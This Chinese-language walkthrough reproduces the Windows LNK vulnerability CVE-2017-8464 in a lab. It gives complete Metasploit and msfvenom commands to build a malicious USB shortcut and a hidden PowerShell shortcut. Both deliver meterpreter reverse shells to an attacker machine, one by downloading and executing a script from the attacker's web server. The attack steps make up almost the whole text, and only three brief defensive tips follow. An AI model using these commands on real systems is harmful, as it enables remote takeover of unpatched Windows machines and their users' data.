一.影响版本
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008
二.漏洞利用与复现
攻击机:kai liunx ip:192.168.1.101
目标机:windows 7 专业版
1.payload1:Metasploit中CVE-2017-8464模块制作U盘
终端打开metasploit,msfconsole
搜索漏洞模块,search cve_2017_8464
使用攻击模块,use exploit/windows/fileformat/cve_2017_8464_lnk_rce
对参数进行设置:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.101 (kai liunx ip)
检查配置是否设置成功:show options
target默认就可以了它会自动选择,也可以自己选择对应的系统版本
开始运行,exploit
注:生成文件存放在/root/.msf4/local/下,注意.msf4是隐藏文件夹
复制生成的文件到自己的移动U盘里
回到kai liunx,使用监听模块,use multi/handler
设置对应的配置:
set paylaod windows/meterpreter/reverse_tcp
set lhost 192.168.1.101
开始监听,exploit
下面就开始你的表演了,把U盘插入目标机,如果是设置了自动播放的话会直接运行FlashPlayerCPLApp.cpl文件,反弹一个session到kai liunx,如果没有就需要手动双击下FlashPlayerCPLApp.cpl文件,反弹session
注:如果没有弹出meterpreter,可以自己选择session进入,session 1
输入shell,成功控制目标机
2.payload2:利用Powershell快捷键
生成攻击文件,search.ps1,终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -f psh-reflection>search.ps1
输入ls进行查看
移动文件到网站根目录/var/www/html下,mv search.ps1 /var/www/html
cd到网站目录下,cd /var/www/html,查看是否移动成功ls
启动apache2服务,并查看是否成功
service apache2 start
service apache2 status
打开metasploit,msfconsole
使用监听模块,use multi/handler
对参数进行设置
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.101
运行模块,exploit
打开目标机,右键新建一个快捷键
输入构造的语句payload:(记得修改成自己kai liunx的ip)
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.101/search.ps1‘);test.ps1"
进行命名
双击快捷键,成功返回到metasploit上一个session
输入shell,就可以控制目标机了
防御方法:
1.及时打上相应补丁
2.关闭USB自动播放
3.安装杀毒软件
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!